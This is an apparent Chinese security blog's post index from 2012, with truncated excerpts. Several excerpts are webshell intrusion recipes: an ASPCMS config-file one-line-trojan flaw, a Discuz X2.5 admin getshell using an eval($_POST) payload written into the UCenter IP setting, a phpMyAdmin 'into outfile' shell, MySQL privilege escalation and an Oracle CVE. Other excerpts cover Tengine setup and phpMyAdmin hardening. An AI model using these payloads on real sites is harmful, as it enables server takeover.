- 博客(9)
- 资源 (1)
- 收藏
- 关注
转载 aspcms投票系统后台插马漏洞
发布日期:2012-12-12发布作者:月末漏洞类型:设计错误漏洞描述:后台配置文件采用文件写入,未严格过滤导致插入一句话木马。 config.asp内容%Const SiteName="ASPCMS 开源投票系统 V1.0" Const ks="0" Const xxps="1"
2012-12-21 22:13:39 2323
转载 Discuz后台拿shell X2.5后台shell
第一:我们进入后台已创始人身份 然后打开站长UC设置 在UCip地址里面填写 经过处理的一句话如下 Madman\\');eval($_POST[a]) ? ;// QQ 然后保存 连接地址: www.xxx.com/config/config_ucenter.php 成功连接
2012-12-20 23:15:10 1280
转载 把Tengine改回NGINX,又能用Tengine的一些特性
第三,最近关于Tengine的讨论很火,简单看了下,在大流量下确实表现不错,而且据说可以过滤掉一些攻击或类似攻击流量,这是其宣称的特性,也是我们要保留的。最后,加上了substitutions和nginx-accesskey这两个模块,前一个可用在垃圾站建设、过滤网页非法信息上,后一个可以做防盗链,非常适合个人站长用。下面来说改动和安装过程,以centos 6 x64为基础环境演示
2012-12-12 14:28:35 1132
转载 淘宝开源Web服务器Tengine基本安装步骤
Tengine 是由淘宝核心系统部基于Nginx开发的Web服务器,它在Nginx的基础上,针对大访问量网站的需求,添加了很多功能和特性。Tengine的性能和稳定性已经在大型的网站如淘宝网,淘宝商城等得到了很好的验证。它的最终目标是打造一个高效、稳定、安全、易用的 Web 平台。Tengine现已开源。 以下是在CentOS 6.0编译安装Tengine的基本步骤:
2012-12-12 14:02:28 443
转载 linux下安装vmtools方法
长期有关注网络安全博客的朋友应该有发现,最近网络安全博客里涉及linux的文章多了。呵呵,向前一篇提升liunx安全的几种方法文章就有介绍了关于linux下提升安全系数的方法。今天在虚拟机中想上网,整了半天,竟然有人跟我说是没有安装VMTOOLS的原因。以前在Ubuntu下是没有安装也能上。不过为了上网死马当活马医了。弄了篇LINUX 虚拟机上安装vmtools的文章。希望大家会喜欢。
2012-12-07 13:02:30 1146
原创 phpmyadmin 拿shell
爆路径,访问:phpmyadmin//themes/darkblue_orange/layout.inc.php 后台选择一个数据库,执行SQL:Create TABLE a (cmd text NOT NULL);Insert INTO a (cmd) VALUES("");select cmd from a into outfile 'E:/AppServ/www/p
2012-12-04 16:16:57 523
转载 Mysql提权总结
create database temp1; //建立数据库temp1use temp1 //选择temp1数据库create TABLE cdb_temp (cmd text NOT NULL); //在temp1数据库中建立表cdb_temp,cmd字段为空Insert INTO cdb_temp (
2012-12-04 16:04:58 805
转载 Oracle漏洞
Oracle 漏洞作者: orape 时间: 2008-3-11 12:38 标题: 回复 #1 orape 的帖子【漏洞编号】 CVE-2004-0637【漏洞名称】 ctxsys.driload.validate_stmt 提升权限漏洞【影响平台】 Oracle 8.i - Oracle9i (all
2012-12-04 15:00:23 1450
转载 phpMyAdmin 的安全
phpMyAdmin is a great tool but it is also a large target by hackers. Take these initial steps to secure your phpMyAdmin install in Ubuntu Linux.1. First we will setup an Apache login and pas
2012-12-02 01:43:32 482
青云服务器安全设置器V2011正式版
2011-09-04
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人